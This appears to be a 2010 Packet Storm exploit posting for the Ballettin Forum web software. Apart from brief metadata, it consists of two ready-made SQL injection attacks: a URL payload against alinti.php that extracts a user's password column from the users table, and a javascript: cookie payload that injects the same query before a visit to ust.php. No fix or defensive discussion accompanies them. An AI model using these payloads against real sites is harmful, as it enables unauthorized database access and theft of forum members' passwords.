Ballettin Forum SQL Injection

2010-07-26T00:00:00
ID PACKETSTORM:92167
Type packetstorm
Reporter evolution
Modified 2010-07-26T00:00:00

Description

                                        
                                            `====================================================================  
# Exploit Title: Ballettin Forum Multiple SQL Injection Vulnerability  
# Date: 25/07/2010  
# Author: 3v0 aka evolution <evolution ^ darkedition.com>  
# Software Link: http://www.ballettin.com  
# Tested on: Windows Xp Pack 3  
====================================================================  
#1 - Vulnerable File  
------------------------------------------------------  
[+] File: http://www.site.com/alinti.php?mesajid=[SQL]  
[+] Exploit: http://www.site.com/alinti.php?mesajid=-6666+UNION+SELECT+sifre+FROM+uyeler+WHERE+id=1  
  
#2 - Insecure Cookie  
------------------------------------------------------  
javascript:document.cookie="ballettin=-6666 UNION SELECT * FROM uyeler WHERE id=1";  
After go to http://www.site.com/ust.php  
====================================================================  
  
`